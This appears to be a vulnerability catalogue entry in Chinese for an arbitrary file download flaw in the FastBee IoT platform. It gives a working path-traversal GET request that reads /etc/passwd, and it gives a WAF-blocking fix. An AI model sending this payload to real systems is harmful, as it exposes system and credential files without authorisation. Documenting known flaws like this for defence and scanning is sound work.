vendor = "蜂信物联"
name = "蜂信物联(FastBee) 物联网平台 任意文件下载漏洞"
type = "任意文件下载"
version = "未知"
path = "/prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd"
detail = "GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1 Host: Accept-Encoding: gzip, deflate, br"
fix = "WAF封禁路路径，等待发布补丁"
date = "0830"
label = "nday"
